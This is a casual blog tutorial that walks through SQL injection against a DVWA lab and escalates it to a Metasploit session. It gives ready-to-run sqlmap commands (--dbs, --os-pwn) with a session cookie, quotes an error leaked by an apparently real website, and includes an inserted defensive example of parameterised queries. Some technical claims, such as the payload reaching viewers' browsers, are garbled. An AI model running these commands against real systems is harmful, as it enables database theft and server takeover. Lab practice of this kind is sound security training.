Wassap people, I am him, the one and only Laughing Man, back with yet another post, this one on going from SQL injection to a Metasploit session. I know most of you are thinking, "Laughing Man, you're talking shit." Well, sorry lads, I'm not. The Metasploit Framework has many uses, not just payloads; it can do almost anything from recon to exploiting. For this I've set up a lab with DVWA, so let's start, lads.
What is SQL injection
SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.
What is Metasploit Framework
The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development.
What is DVWA
DVWA is the Damn Vulnerable Web App, coded in PHP/MySQL. Seriously, it is too vulnerable. In this app security professionals and ethical hackers test their skills and run their tools in a legal environment. It also helps web developers better understand the processes of securing web applications, and helps teachers and students teach and learn web application security in a safe environment.
The aim of DVWA is to practice some of the most common web vulnerabilities, with various difficulty levels.
What is Burp Suite
Burp Suite is a Java-based web penetration testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications.
What is sqlmap
sqlmap is open source software used to detect and exploit database vulnerabilities; it provides options for injecting malicious code into them. It is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws, with its user interface in the terminal.
How to perform the attack
First of all we get our target. This is my target:
http://192.168.8.101/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#
Now that I have my target I can check whether it is vulnerable to SQL injection, so what we do is put a ' right after the 1 in the URL.
Once you add the ' at the end of the URL you see this message:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
For another example, when we add the ' at the end of the URL it tells us there's an error:
"Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c05/h02/mnt/83231/domains/asfaa.org/html/members.php on line 67"
When we get this error we can use tools like sqlmap, Burp Suite, etc.
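Why the single quote produces that syntax error, and what removes it, shown as an added example (not code from the original post or from DVWA). It uses Python's sqlite3 with a constructed table, so the error text differs from MariaDB's; the table, column and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample table; names are assumptions, not DVWA's schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("1", "admin"), ("2", "gordon")])
    return db

def lookup_concat(db, user_id):
    """Weak form: the id parameter is pasted into the SQL text."""
    sql = "SELECT first_name FROM users WHERE user_id = '" + user_id + "'"
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # Echoing the driver error back to the client is what makes the
        # flaw visible from the outside, as in the messages quoted above.
        return "DB error: %s" % exc

def lookup_param(db, user_id):
    """Hardened form: the value is bound, so it is never parsed as SQL."""
    try:
        rows = db.execute(
            "SELECT first_name FROM users WHERE user_id = ?", (user_id,))
        return [row[0] for row in rows]
    except sqlite3.Error:
        # Log details server-side in a real app; the client gets nothing.
        return []

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):   # a normal id, then the id with a stray quote
        print(repr(value), "| concat:", lookup_concat(db, value),
              "| bound:", lookup_param(db, value))
```

With the bound query the stray quote is just part of a value that matches no row, so there is no error for the client to see.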
Now we need to set up the Burp Suite proxy in Firefox, so type about:preferences into the URL bar in Firefox to get the settings, then scroll down to network and set the proxy for Burp Suite.
Now we load up Burp Suite: open the terminal and type burpsuite, or go to the top left of the screen to Applications, then Web Application Analysis, and click Burp Suite.
Now when we add the ' to the URL, Burp Suite will pop up.
The cookie we need is Cookie: security=low; security=low; PHPSESSID=4kaa6819siab01k545959q45v0
Now we open a new terminal and type:
sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --dbs
Now we type:
sqlmap -u 192.168.8.101/DVWA/vulnerabilities/sqli/ --data="id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4kaa6819siab01k545959q45v0" --msf-path=/usr/share/metasploit-framework/ --os-pwn --tmp-path="C:/Docments and settings/Administrator/Local Settings/Temp"
Now we pick the payload; I mostly pick PHP.
This will add the payload to the site and inject it into the browser of the viewers.
show the proof it was connected
There ya have it, lads and gals: how to use sqlmap to get a Metasploit session. Don't use this for the wrong reasons; hacking is against the law unless you have the consent of the owner.